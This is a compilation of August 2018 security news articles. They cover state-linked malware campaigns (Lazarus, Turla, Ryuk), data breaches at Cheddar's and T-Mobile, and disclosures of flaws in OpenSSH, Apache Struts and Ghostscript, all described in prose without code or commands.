To make the update process easier for device makers, Google has improved Android’s modularity, so that subsystems can be updated individually, without impacting others.

“The modularity strategy applies equally well for security updates, as a framework security update can be performed independently of device specific components,” Google explains.

The company also developed security update testing systems that are meant to ensure patches aren’t omitted when security updates are released.

A new testing infrastructure allows manufacturers “to develop and deploy automated tests across lower levels of the firmware stack that were previously relegated to manual testing,” Google says. The Android build approval process now also scans device images for specific patterns to reduce the risk of omission.

Last year, security updates arrived on around a billion Android devices, a 30% growth over the preceding year, and Google expects the growth to continue. Thus, the company aims to decrease the incidence of potentially harmful exploitation of bugs.

“We continue to work hard devising thoughtful strategies to make Android easier to update by introducing improved processes and programs for the ecosystem. In addition, we are also working to drive increased and more expedient partner adoption of our security update and compliance requirements,” Google reveals.

North Korean Hackers Hit Cryptocurrency Exchange with macOS Malware
24.8.2018 securityweek Apple

In a recent attack against a cryptocurrency exchange, the North Korea-linked Lazarus group went the extra mile by deploying malware for macOS, Kaspersky Lab has discovered.

Active since at least 2009 and supposedly backed by the North Korean government, Lazarus is considered the most serious threat to banks. The group is said to have orchestrated a large number of high profile attacks, including the Sony hack in 2014 and last year’s WannaCry outbreak.

In the recent months, in addition to banks, the group focused on various cryptocurrency exchanges. In one of the attacks, which Kaspersky refers to as Operation AppleJeus, the group tricked an unsuspecting employee to download a trojanized cryptocurrency trading application that covertly downloaded and installed the Fallchill malware.

What made this attack stand out compared to other Lazarus-linked incidents, however, was the fact that the attackers designed their malware to target macOS too, in addition to Windows. This is the first time Lazarus is observed using malware for Apple’s operating system, Kaspersky says.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” the security firm points out.

The malicious code, however, wasn’t delivered alongside the application’s installation package. Instead, it was pushed to the target machine in the form of an update, Kaspersky’s security researchers have discovered.

The legitimate-looking application is called Celas Trade Pro and comes from Celas Limited. An all-in-one style cryptocurrency trading program, it showed no signs of malicious behavior at first.

However, at the end of the installation process, it was seen running the Updater.exe module, which would collect system information and send it back to the server in the form of a GIF image.

Based on the server’s response, the updater either keeps quiet or extracts a payload with base64 and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

“For macOS users, Celas LLC also provided a native version of its trading app. A hidden ‘autoupdater’ module is installed in the background to start immediately after installation, and after each system reboot,” Kaspersky explains.

The module would continuously contact the command and control (C&C) server to fetch and run an additional executable file. The communication with the server is performed in a manner similar to that employed by the Windows version, with the system information being sent encrypted, disguised as an image file upload and download.

The Updater application is unlisted in the Finder app or default Terminal directory listing and is passed the command-line argument “CheckUpdate” at launch. Apparently, the application quits if no argument is fed, likely a way to trick detection by sandboxes.

The updater works the same as the Windows variant, both being implemented using the cross-platform Qt framework. At execution, it creates a unique identifier for the infected host, collects basic system information, then encrypts the data and transfers it to the attacker’s server.

The dropped executable file has an unusually large size, likely because it was inflated with junk data. The main purpose of the malware is to implant the Fallchill backdoor loader onto the compromised machine.

The Fallchill backdoor is a piece of malware formerly attributed to the Lazarus group that contains “enough functions to fully control the infected host,” Kaspersky points out. The malware operators appear to be reusing code and C&C infrastructure over and over again, the security firm also notes.

“Lazarus group has entered a new platform: macOS. […] We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once,” Kaspersky says.

What is yet unclear, however, is whether Lazarus was able to compromise Celas and abuse its update mechanism to deliver malware, or if the hackers managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism,” thus creating a fake supply chain.

Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.2018 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up to total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of watching to IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in synch with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 2018 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.

Australia Bans Huawei From 5G Network Over Security Concerns
24.8.2018 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.

Intel Simplifies Microcode Update License Following Complaints
24.8.2018 securityweek Hacking

Intel has made significant changes to the license for its latest CPU microcode updates after users complained that the previous version banned benchmarks and comparison tests.

Since January, when researchers disclosed the existence of the speculative execution vulnerabilities known as Spectre and Meltdown, Intel has released several rounds of microcode updates designed to prevent these and similar attacks.

The latest updates are designed to address three vulnerabilities tracked as Foreshadow or L1 Terminal Fault (L1TF). Microsoft and Linux distributions have begun distributing the microcode updates for these flaws, but some people noticed that the license file delivered with the updates prohibits benchmarking.

“Unless expressly permitted under the Agreement, You will not, and will not allow any third party to [...] publish or provide any Software benchmark or comparison test results,” the license read.

The mitigations for speculative execution vulnerabilities have been known to have a significant impact on performance in some cases. In the case of the Foreshadow flaws, Intel and Microsoft said there should not be any performance degradation on consumer PCs and many data center workloads. However, some data center workloads may be slowed down.

Someone at Intel apparently attempted to prevent users from making public the results of performance impact testing for the latest mitigations, but people quickly noticed.

“Lots of people are interested in the speed penalty incurred in the microcode fixes, and Intel has now attempted to gag anyone who would collect information for reporting about those penalties, through a restriction in their license,” Bruce Perens, one of the founders of the open source movement, wrote in a blog post.

“Bad move. The correct way to handle security problems is to own up to the damage, publish mitigations, and make it possible for your customers to get along. Hiding how they are damaged is unacceptable. Silencing free speech by those who would merely publish benchmarks? Bad business. Customers can’t trust your components when you do that,” he added.

Lucas Holt, project lead at MidnightBSD, noted on Twitter, “Performance is so bad on the latest spectre patch that intel had to prohibit publishing benchmarks.”

Following complaints, Intel has decided to significantly simplify the license. It now only says that redistributions of the microcode updates must include a copyright notice and a disclaimer, Intel’s name cannot be used to endorse or support products derived from its software, and that reverse engineering or disassembly of its software are not permitted.

“We have simplified the Intel license to make it easier to distribute CPU microcode updates,” said Imad Sousou, corporate VP and GM of Intel’s Open Source Technology Center. “As an active member of the open source community, we continue to welcome all feedback and thank the community.”

Intel allows microcode update benchmarks after user complaints

Oath Pays Over $1 Million in Bug Bounties
24.8.2018 securityweek Security

As part of its unified bug bounty program, online publishing giant Oath has paid over $1 million in rewards for verified bugs, the company announced this week.

In April, Oath paid more than $400,000 in bug bounties during a one-day HackerOne event in San Francisco, where 40 white hat hackers were invited to find bugs in the company’s portfolio of brands and online services, including Tumblr, Yahoo, Verizon Digital Media Services and AOL.

The event also represented an opportunity for the company to formally introduce its unified bug bounty program, which brought together the programs that were previously divided across AOL, Yahoo, Tumblr and Verizon Digital Media Services (VDMS).

Only two months later, the program had already surpassed $1 million in payouts for verified bugs, the media and tech company says.

“This scale represents a significant decrease in risk and a considerable reduction of our attack surface. Every bug found and closed is a bug that cannot be exploited by our adversaries,” Oath CISO Chris Nims now says.

Nims also points out that, following the feedback received from participants, the company also made a series of changes to their program policy. The company is now willing to hand out rewards for more types of vulnerabilities, although SQLi, RCE and XXE/XMLi flaws are still a priority.

Oath also published the payout table to increase the transparency of the program.

Additionally, the media giant has added EdgeCast to the bug bounty program, by opening the VDMS-EdgeCast-Partners and VDMS-EdgeCast-Customers private programs, which were previously operated separately, to the unified program.

Oath also plans on defining a structured scope for the suite of brands included in the unified bug bounty program. The purpose of this is to “help separate and define bugs for different assets.”

“The security landscape changes constantly, and we hope these updates to the bug bounty program will keep both Paranoids and security researchers alike more adept to detect threats before they cause damage to our community,” Nims concludes.

Half a Million Cards Exposed in Cheddar's Scratch Kitchen Breach
24.8.2018 securityweek Incindent

Over half a million payment card numbers were exposed after cybercriminals compromised the point-of-sale system of certain Cheddar's Scratch Kitchen restaurants, Darden Restaurants announced.

Previously known as Cheddar's Casual Café and based in Irving, Texas, Cheddar's Scratch Kitchen was founded in 1979 and had more than 163 locations in 23 states as of 2016. Darden acquired the concept in 2017.

In a notice published this week, Darden revealed that it learned of the data breach on August 16, 2018, from federal authorities. The compromised system, the company says, was a legacy point-of-sale system used in certain restaurant locations.

The incident might have impacted the payment card information of guests who visited the affected Cheddar's restaurants between Nov. 3, 2017 and Jan. 2, 2018. A total of 567,000 payment card numbers are believed to have been compromised.

The data breach impacted Cheddar's restaurants located in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia and Wisconsin.

The company says that it has engaged a third-party forensic cybersecurity firm to investigate the incident and that its current systems and networks were not impacted. The legacy system that was compromised has “was permanently disabled and replaced by April 10, 2018, as part of our integration process,” the company says.

Cheddar's isn’t the only restaurants chain to have a payment card breach this year. Malware at Chili’s restaurants collected customer card information in March and April, Brinker, which operates over 1,600 Chili’s and Maggiano’s restaurants, revealed in May.

In March, RMH Franchise Holdings revealed that over 160 Applebee’s restaurants were impacted by point-of-sale (PoS) malware that could collect names, credit or debit card numbers, expiration dates, and card verification codes.

North Korea-linked Lazarus APT uses first Mac malware in cryptocurrency exchange attack
24.8.2018 securityaffairs APT

North Korea-linked Lazarus APT group leveraged for the first time on a MacOS variant of the Fallchill malware in a cryptocurrency exchange attack.
According to Kaspersky, the North Korea-linked Lazarus group used a macOS malware to target a cryptocurrency exchange in a recent attack.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

Recently the APT targeted cryptocurrency exchanges and cryptocurrency companies, experts from Kaspersky Lab tracked a new campaign dubbed Operation AppleJeus aimed at spreading a tainted cryptocurrency trading application.

“While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email.” states the report published by Kaspersky.

“It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate looking website and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to.”

Lazarus infection macOS

The novelty of this attack is that the attacker for the first time used a version of the Fallchill malware specifically developed to target macOS systems, in addition to Windows.

The new development is very important for the strategy of the group that is expanding the list of potential targets.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” continues Kaspersky.

The malware was inserted into the installation package, instead, it was delivered to the target machine in the form of an update.

The experts discovered that the APT used the legitimate-looking application called Celas Trade Pro and comes from Celas Limited.

At the end of the installation process, the software runs the Updater.exe module that gathers system information and sends it back to the server in the form of a GIF image.

The malware continuously connects the command and control (C&C) server to fetch and execute an additional executable file.

Based on the server’s response (response HTTP code 200), the updater could extract a malicious code encoded with base64 and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

For macOS users, Celas LLC also provided a native version of its trading app, experts noticed that a hidden ‘autoupdater’ module is installed in the background to start immediately after installation and also after every system reboot.

At the time of the report, it was not clear whether Lazarus compromised Celas server in a classic supply chain attack or managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism.”

Once the Cellas Trade Pro app is installed on macOS, it launches the Updater application on the system load via a file named “.com.celastradepro.plist.”

The fact that it starts with a dot symbol makes the Updates unlisted in the Finder app or default Terminal directory listing.

The “Updater” file is passed the “CheckUpdate” parameter on start, it quits if no argument is passed.

The updater is implemented using the cross-platform Qt framework, once executed it creates a unique identifier for the infected host, collects system information, and send them to the attacker’s server in encrypted format.

“First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools.” concludes Kaspersky.

“We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.”

Latest Turla backdoor leverages email PDF attachments as C&C mechanism
24.8.2018 securityaffairs APT

Malware researchers from ESET have published a detailed report on the latest variant of the Turla backdoor that leverages email PDF attachments as C&C.
Malware researchers from ESET have conducted a new analysis of a backdoor used by the Russia-linked APT Turla in targeted espionage operations.

The new analysis revealed a list of high-profile victims that was previously unknown.

Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

The new analysis conducted by ESET revealed that hackers breached Germany’s Federal Foreign Office, Turla infected several computers and used the backdoor to syphon data for almost the whole of 2017.

The cyberspies first compromised the network of the country’s Federal College of Public Administration, then breached into the network of the Foreign Office in March 2017, the hack was discovered by German authorities at the end of the year and publicly disclosed in March 2018. ESET explained that the most important aspect of the new analysis is the discovery of a covert access channel used by Turla to hit foreign offices of another two European countries.

“Importantly, our own investigation has determined that, beyond this much-publicized security breach, the group has leveraged the same backdoor to open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.” reads the analysis published by ESET.

“These organizations are the latest known additions to the list of victims of this APT group that has been targeting governments, state officials, diplomats, and military authorities since at least 2008.”

The Turla backdoor has been used since at least 2009 and was continuously improved across the years. The most recent samples appear very sophisticated and implement a rare degree of stealth and resilience. The last analyzed variant is dated back April 2018 and implements the ability to execute malicious PowerShell scripts directly in computer memory.

turla backdoor

The malware analyzed by ESET does not use a classic command and control server, instead, it receives updates and instructions via PDF files delivered via email.

“Rather than using a conventional command-and-control (C&C) infrastructure, such as one based on HTTP(S), the backdoor is operated via email messages; more specifically, through specially crafted PDF files in email attachments.” continues the analysis.

“The compromised machine can be instructed to carry out a range of commands. Most importantly, these include data exfiltration, as well as the downloading of additional files and the execution of additional programs and commands. Data exfiltration itself also takes place via PDF files.”

Information is exfiltrated by generating a PDF with the siphoned data and sent out via emails and message metadata.

“From the PDF documents, the backdoor is able to recover what attackers call a container in the logs. This is a binary blob with a special format that contains encrypted commands for the backdoor,” reads the report released by ESET.

“Technically, the attachment does not have to be a valid PDF document. The only requirement is that it includes a container in the right format.”

The Turla backdoor deletes the messages sent to or received from the attacker to remain stealth.

The backdoor is a standalone DLL (dynamic link library) that interacts with Outlook and The Bat! email clients, it gains persistence by using COM object hijacking. With this trick, the malicious DLL could be loaded each time Outlook loads the COM object.

Differently from other backdoors, the Turla sample subverts Microsoft Outlook’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes and avoid being detected.

The backdoor implements several commands, below the full list:

Turla backdoor

ESET experts did not detect any PDF sample including the commands for the backdoor, but they were able to create such a document.

The full list of Indicators Of Compromise (IoCs) and samples can be found on GitHub.

Expert found a flaw that affects all OpenSSH versions since 1999
24.8.2018 securityaffairs

Security expert discovered a username enumeration vulnerability in the OpenSSH client that affects all versions of the software that was released since 1999.
Security expert Darek Tytko from has discovered a username enumeration vulnerability in the OpenSSH client. The flaw tracked as CVE-2018-15473 affects all versions of the software that was released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

OpenSSH maintainers have now released a security fix, but since the OpenSSH client is included in a broad range of software applications many of them could remain vulnerable for a long time.

Researchers from Qualys have published a detailed analysis of the vulnerability once discovered that the bug was fixed.

The flaw could potentially impact billion of devices using the vulnerable software.

Let’s see in detail how attackers can trigger the flaw.

The attacker tries to authenticate on an OpenSSH endpoint using a malformed authentication request (i.e. a truncated packet).

A vulnerable OpenSSH server, in turn, would respond in two different ways.

If the username included in the malformed authentication request does not exist, the server responds with authentication failure reply, otherwise, the server closes the connection without a reply.

“The attacker can try to authenticate a user with a malformed packet (for example, a truncated packet), and:

if the user is invalid (it does not exist), then userauth_pubkey() returns immediately, and the server sends an SSH2_MSG_USERAUTH_FAILURE to the attacker;
if the user is valid (it exists), then sshpkt_get_u8() fails, and the server calls fatal() and closes its connection to the attacker.” states the advisory.
“We believe that this issue warrants a CVE; it affects all operating systems, all OpenSSH versions (we went back as far as OpenSSH 2.3.0, released in November 2000), and is easier to exploit than previous OpenSSH username enumerations (which were all timing attacks):”


The flaw could allow an attacker to guess valid usernames registered on an SSH server, then to launch brute-force attacks to guess the password.

Open SSH versions 1:6.7p1-1 and 1:7.7p1-1— and the 1:7.7p1-4 unstable branch have addressed the flaw.

Proof-of-concept codes for the vulnerability are already available online:
The security researchers Didier Stevens of NVISO Labs also published a detailed analysis of the flaw that includes instructions to test servers against it.

T-Mobile data breach exposed personal information of up to 2 million customers
24.8.2018 securityaffairs Incindent

T-Mobile today announced It has suffered a security breach that May have exposed personal information of up to 2 million T-mobile customers.
According to the telco giant, the incident affected its US servers on August 20,
leaked information includes customers’ name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid).
T-Mobile notified the security breach to the affected customers and via SMS message, letter in the mail, or a phone call.
“Our cyber-security team discovered and shut down an unauthorized access to certain information, including yours, and we promptly reported it to authorities. None of your financial data (including credit card information) or social security numbers were involved, and no passwords were compromised” reads the announcement published on the company’s website.
“However, you should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid).”
The Company excluded that the security breach may have exposed financial data such as credit card numbers.

In a blog post published by T-Mobile, the company explained that how its staff has detected and locked out the intruders on Monday, August 20.

At the time T-Mobile did not share details of the hack and did not provide Information on the extension of the incident.

A spokesperson for T-Mobile told Motherboard that the incident affected less than 3 percent of its 77 million customers.
The spokesperson added that the attack was carried out by hackers of “an international group.”
T-Mobile hack
The attackers managed to access T-Mobile servers through an API. The good news is that the API was not designed to provide access to financial data or other sensitive Information.
“We found it quickly and shut it down very fast.” Added the spokesperson.
T-Mobile reported the incident to law enforcement.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.”

The company is urging customers to contact its customer service through 611 for any information regarding the security breach.

Attack on DNC Part of Simulated Phishing Test

23.8.2018 securityaffairs Attack

A recent phishing attack aimed at the Democratic National Committee’s voter database was actually part of a simulation, researchers and representatives of the Democratic Party confirmed.

Cybersecurity firm Lookout this week came across a custom phishing website apparently aimed at the Democratic National Committee (DNC), specifically its VoteBuilder service.

The phishing site mimicked a login page of NGP VAN, a technology provider for the Democratic Party, and was hosted by DigitalOcean.

Lookout immediately notified the DNC, NGP VAN and DigitalOcean, and the phishing page was removed within hours, before any credentials were compromised. The FBI was also informed and an investigation was launched.

However, after further analysis, the DNC now believes the fake website was actually created by a third-party as part of a “simulated phishing test on VoteBuilder.”

“The test, which mimicked several attributes of actual attacks on the Democratic party's voter fil­e, was not authorized by the DNC, VoteBuilder nor any of our vendors,” explained Bob Lord, the DNC’s chief security officer.

“There are constant attempts to hack the DNC and our Democratic infrastructure, and while we are extremely relieved that this wasn't an attempted intrusion by a foreign adversary, this incident is further proof that we need to continue to be vigilant in light of potential attacks,” Lord added.

Mike Murray, who leads Lookout’s intelligence team, confirmed that it was a false alarm.

“The thing about ‘false alarms’ is that you don’t know that they’re false until you’ve showed up to investigate,” Murray said on Twitter. “All the folks who pulled together on this were amazing, and had this been a real attack, would have stopped something terrible.”

According to PCMag tech reporter Michael Kan, the phishing test was actually commissioned by the Michigan Democratic Party, but without authorization from the DNC.

SecurityWeek has reached out to the Michigan Democratic Party for comment and will update this article if the organization responds.

“I would [...] not call this a TEST as the phishing attempt was being conducted on a live production system against real people,” Joseph Carson, chief security scientist at Thycotic, told SecurityWeek. “The positive side is that newer technology is helping organizations identify such threats earlier however, this did raise a major issue to attribution and the source of the hacks because as we know, many cyberattacks utilize third party vendors,”

“I would actually handle this incident as an attempted cyberattack since the DNC has confirmed it was not authorized or approved so therefore a full incident and digital forensics process should be carried out even though it was a so-called test,” Carson said.

Critical Apache Struts 2 Flaw Allows Remote Code Execution
23.8.2018 securityweek

Updates released on Wednesday for the Apache Struts 2 open source development framework address a critical vulnerability that can be exploited for remote code execution.

The flaw, tracked as CVE-2018-11776, affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Patches are included in Struts 2.3.35 and 2.5.17. A temporary workaround has also been made available, but Struts developers have described it as “weak” and advised users to install the updates as soon as possible.

“It is possible to perform a RCE attack when namespace value isn't set for a result defined in underlying xml configurations and in same time, its upper action(s) configurations have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set and in same time, its upper action(s) configurations have no or wildcard namespace,” Struts developers wrote in an advisory.

The vulnerability was discovered by a researcher from Semmle, a code analysis company that announced its global launch this week, along with $21 million in funding.

Semmle has published a blog post containing technical details on the vulnerability. According to the company, the issue was reported to the Apache Struts Security Team on April 10 and code patches were released on June 25.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers. On top of that, the weakness is related to the Struts OGNL language, which hackers are very familiar with, and are known to have been exploited in the past,” said Man Yue Mo, the Semmle researcher who discovered CVE-2018-11776.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Semmle has only made public limited details in an effort to prevent malicious exploitation. The company last year discovered another Apache Struts vulnerability that ended up being exploited in the wild. However, the new flaw is even more severe, Man Yue Mo said.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.

Organizations Hit With North Korea-Linked Ryuk Ransomware
23.8.2018 securityweek

A recent wave of ransomware attacks against organizations around the world have been linked to a notorious North Korean threat actor, security firm Check Point says.

The campaign appears highly targeted, with at least three organizations in the United States and worldwide severely affected. Because some victims decided to pay large ransoms in order to retrieve access to their files, the campaign operators are estimated to have netted over $640,000 to date.

Two ransom note versions were sent to victims, a longer, well-worded one that demanded a payment of 50 Bitcoin (around $320,000), and a shorter, more blunt note, demanding payments between 15-35 BTC (up to $224,000).

Dubbed Ryuk, the ransomware used in these attacks appears connected to Hermes, a piece of file-encrypting malware previously associated with the North Korean threat group Lazarus. Hermes too was used in targeted attacks, including the attack against the Far Eastern International Bank (FEIB) in Taiwan.

Thus, Check Point’s security researchers concluded that Lazarus could be responsible for the Ryuk ransomware as well, unless another actor was able to get Hermes’ source code and used it to build their own malware.

As Intezer and McAfee revealed not long ago, however, most North Korean malware can be linked to Lazarus via code reuse.

Ryuk’s encryption scheme, the researchers note, was built specifically for small-scale operations. Thus, not only is the infection carried out manually by the operators, but the malware itself infects only crucial assets and resources on the targeted networks.

The ransomware’s encryption logic resembles that found in Hermes, and the code used to generate, place and verify a marker to determine if a file was already encrypted is identical in both malware families. The function that invokes this routine conducts very similar actions in both cases.

Furthermore, both ransomware families drop to the disk files that resemble in name and purpose, and Check Point notes that such similarity of code “might well be a sign of an underlying identical source code.”

As part of the recent attacks, a dropper containing both the 32-bit and 64-bit modules of the ransomware was used. When run, Ryuk checks if it was executed with a specific argument and then kills more than 40 processes and over 180 services belonging to antivirus, database, backup and document editing software.

The ransomware also achieves persistence onto the infected machines and attempts to encrypt network resources in addition to local drives. It also destroys its encryption key and deletes shadow copies and various backup files from the disk, to prevent users from recovering files.

The researchers also note that, from the exploitation phase through to the encryption process and the ransom demand itself, the Ryuk campaign is clearly targeted at organizations that can pay large ransom amounts.

Almost all of the observed Ryuk ransomware samples, the security researchers say, were provided with a unique wallet. Shortly after the victim paid the ransom, the attackers divided the funds and transmitted them through multiple accounts.

“We were able to spot a connection between these wallets, as funds paid to them were transferred to several key wallets at a certain point. This may indicate that a coordinated operation, in which several companies have been carefully targeted, is currently taking place using the Ryuk ransomware,” Check Point says

Unpatched Ghostscript Vulnerabilities Impact Popular Software
23.8.2018 securityweek

Ghostscript Impacted by Multiple -dSAFER Sandbox Bypass Vulnerabilities

Unpatched vulnerabilities in Ghostscript impact a broad range of popular software products, including several Linux distributions, CERT/CC reveals in a Tuesday alert.

Ghostscript, a suite of software based on an interpreter for Adobe's PostScript and PDF page description languages, is widely used across stand-alone and web applications, including packages such as GIMP and ImageMagick.

The same as other highly popular software out there, vulnerabilities in Ghostscript are valuable targets for both cybercriminals and threat actors, and such flaws have been already abused by North Korea-linked hackers.

Now, Google Project Zero security researcher Tavis Ormandy says that Ghostscript is impacted by multiple critical vulnerabilities and that “ImageMagick, Evince, GIMP, and most other PDF/PS tools” are impacted as well.

In addition to several -dSAFER sandbox escapes reported a few years ago, the popular interpreter is also impacted by “a few file disclosure, shell command execution, memory corruption and type confusion bugs,” the researcher says.

Although there is a -dSAFER option to prevent unsafe PostScript operations, there are numerous operations that bypass the protections provided by -dSAFER, thus allowing an attacker to execute arbitrary commands with arbitrary arguments, the CERT/CC warns.

In their alert, CERT/CC notes not only that there are multiple -dSAFER sandbox bypass vulnerabilities impacting Ghostscript, but also that these are inherited in all applications that leverage the interpreter. These flaws could be exploited by an unauthenticated attacker for remote command execution.

Artifex Software, ImageMagick, Red Hat, and Ubuntu products have been already found to be affected, but other products might be impacted as well. Thus, CERT/CC decided to warn all major software companies on the issue.

One solution to the issue, Ormandy notes, is to disable all the ghostscript coders in policy.xml. CERT/CC also advises the use of policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content.

“In the short term the advice for distribution to start disabling PS, EPS, PDF and XPS coders by default is the only defense until a fix is available,” Stephen Giguere, Sales Engineer at Synopsys, confirms in an emailed statement for SecurityWeek.

“Ghostscript is used pretty much everywhere and has been for a very long time. Packages like GIMP (a Photoshop alternative) but more important for web applications, ImageMagick are prevalent to the extent of being standard for the processing of PDF files. This exploit has the potential for file system access leading to sensitive data leak and more as it can be the beachhead opportunity for a more comprehensive data breach,” Giguere says.

Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.2018 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

